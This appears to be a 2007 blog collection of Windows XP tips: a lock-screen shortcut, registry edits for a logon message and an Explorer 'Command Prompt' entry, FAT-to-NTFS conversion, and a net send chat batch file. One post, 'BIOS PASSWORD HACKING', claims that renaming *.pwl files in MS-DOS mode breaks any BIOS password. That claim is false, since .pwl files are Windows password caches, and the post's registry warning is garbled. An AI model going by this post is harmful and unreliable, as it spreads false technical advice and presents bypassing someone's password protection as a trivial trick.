2007-10-29T10:33:00.001-07:00

Feel hard to press CTRL+ALT+ DEL to lock your machine. Try this and create the icon to lock the machine on your desktop .

1. Right click an empty spot on the desktop, point to New and click Shortcut.

2. In the Create Shortcut dialog box, copy the following into the 'Type the location' of the item text box: "rundll32 user32.dll,LockWorkStation" remove quotes while typing.

3. Click Next.

4. In "Type a name for this shortcut", type LOCK and Click Finish

5. Now just click on that icon and enjoy.

Create Your Own Logon Message

2007-10-29T10:31:00.000-07:00

1 Click start
click run
type regedit, then click ok!

2 In The registry editor, drill down to the following key:hklm\software\Microsoft\Windows NT\Current version\Winlogon.

3 Right click LegalNoticeCaption, click modify, Type: My windows XP Machine,and then click ok!

4 Right click legalNoticeText, click modify, and then Close your message!

5 Restart Your Computer.

6 The message will appear every time you logon!

Convert FAT- NTFS

2007-10-29T10:30:00.002-07:00

To convert a FAT partition to NTFS, perform the following steps.
Click Start, click Programs, and then click Command Prompt. In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS. Convert.exe will attempt to convert the partition to NTFS.

NOTE:=Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command.

Chat With Command Prompt

2007-10-29T10:30:00.001-07:00

If you want a private chat with a friend or client on you Network,
you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:

Message:

Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

BIOS PASSWORD HACKING

2007-10-29T10:24:00.000-07:00

If u wanna to hack the windows BIOS password then u have to do nothing more....... U have to just follow some steps

1)first reboot the pc if it is first booted

2)press f8 key

3)boot the computer in ms-dos mode(command prompt)

4)then just write c:\>ren *.pwl *.abc and just press enter

5)this will break any of ur windows bios password

6)this command is dangerous if used in a wrong manner then it must change the windows registry

Adding Command Prompt In The Right Button In Explorer

2007-10-29T10:15:00.000-07:00

I wasted lot of time in searching this tweak for Windows XP. Here I am sharing this tweak with you.This might be useful to you.

You can do this in the following steps-

1.Goto Start->Run.Enter regedit

.2.Backup your Registry first.This is a very important step.If your registry gets corrupted you can use this Backup to restore it.

3.Find the following key HKEY_CLASSES_ROOT\Directory\shell & make a new key called Command Prompt.

4.Within this key create another key called command.

5.Now go to the right panel and modify the default with : Cmd.exe /k cd "%1or you can copy the following code into a Text Editor such as Notepad.

Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt][HKEY_CLASSES_ROOT\Directory\shell\Command Prompt\command]@="Cmd.exe /k cd \"%1\""

& save this file with a .reg extension.Double Click on this file & Merge this file into Registy.

This is a small trick i like to share it with you.

In a command window you can use the TAB key as "complete" key - like in unix/linux.

Example:
Start a cmd window and go to root (c:\)

type cd - hit TAB key - and you will now scroll the directories, also hidden ones.

Try: cd doc - hit TAB key - You get up "Documents and Settings" - hit enter. in Documents and Settings type cd and hit key several time - and you will scroll through the names of the directories - also the hidden ones.